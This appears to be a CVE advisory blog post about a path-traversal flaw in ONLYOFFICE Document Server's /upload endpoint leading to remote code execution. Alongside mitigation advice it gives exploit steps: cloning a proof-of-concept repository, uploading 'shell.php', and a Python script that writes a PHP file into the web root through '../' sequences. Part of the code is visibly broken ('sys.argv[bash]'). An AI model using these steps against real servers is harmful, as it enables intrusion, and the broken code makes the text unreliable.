ONLYOFFICE Document Server, Directory Traversal with Remote Code Execution, CVE-2021-3199 (Critical) -DC-Oct2026-2944

Listen to this Post

CVE-2021-3199 represents a critical path traversal vulnerability discovered within the ONLYOFFICE Document Server application.
Specifically, this security flaw manifests inside the image upload functionality located at the /upload endpoint.
When JSON Web Tokens (JWT) are enabled for securing communication and requests, the endpoint fails to properly validate input.
An unauthenticated or authenticated attacker can supply a specially crafted file upload parameter containing dot-dot-slash sequences.
These traversal strings, such as /.. or ../../../../, trick the server-side file handling logic into escaping its sandbox directory.
Instead of storing uploaded images within the designated temporary directory, the application writes files to arbitrary file system locations.
Because the server resolves these paths dynamically, malicious scripts or web shells can be placed directly into web-accessible directories.
If the underlying service account possesses sufficient write permissions to target paths, remote code execution becomes trivial.
Exploitation relies heavily on manipulating the filename parameter within the multipart/form-data upload request payload.
The vulnerability highlights the critical danger of inadequate path canonicalization and weak input sanitization in document processing servers.
Versions of ONLYOFFICE Document Server prior to 5.6.3 are fully vulnerable to this flaw unless patched or updated.
Security researchers have published proof-of-concept exploit scripts demonstrating how automated requests achieve arbitrary file write.
The inclusion of JWT protection did not prevent the traversal because the filename parameter itself was processed without validation.
Mitigation requires enforcing strict checks on all uploaded filenames and restricting directory creation and modification rights.
Updating to version 5.6.3 permanently resolves the issue by implementing robust path verification routines.

DailyCVE Form:

Platform: ONLYOFFICE Document Server
Version: Before 5.6.3
Vulnerability: Path Traversal RCE
Severity: Critical Risk
date: January 26 2021

Prediction: Already Patched 2021

What Undercode Say:

git clone https://github.com/moehw/poc_exploits.git
cd CVE-2021-3199
python3 poc_uploadImageFile.py -u http://target/upload -f shell.php
import requests
import sys
target_url = sys.argv[bash]
upload_path = "../../../../var/www/onlyoffice/documentserver/shell.php"
payload = {"file": (upload_path, "<?php phpinfo(); ?>")}
headers = {"Authorization": "Bearer token"}
response = requests.post(target_url, files=payload, headers=headers)
print(response.status_code)

Exploit: (Educational Purposes!)

The exploit targets the vulnerable /upload route of ONLYOFFICE Document Server. By injecting directory traversal sequences directly into the image upload file parameter, an attacker breaks out of the intended sandbox storage directory. When processed by the server application, the payload file is written to an arbitrary location on the file system. If aligned with web root directories or executable paths, this results in direct remote code execution when the uploaded script is subsequently requested or triggered via HTTP.

Protection: from this CVE

Upgrade ONLYOFFICE Document Server to version 5.6.3 or later.
Implement robust input validation and path canonicalization for all file upload endpoints.
Restrict file system write permissions for the document server service user to prevent arbitrary file writes.
Ensure JWT authentication secrets are rigorously managed and validated.

Impact:

Complete remote code execution on the server hosting the vulnerable application.
Full system compromise allowing attackers to read, modify, or delete sensitive enterprise data.
Potential pivot point for lateral movement within the internal network infrastructure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top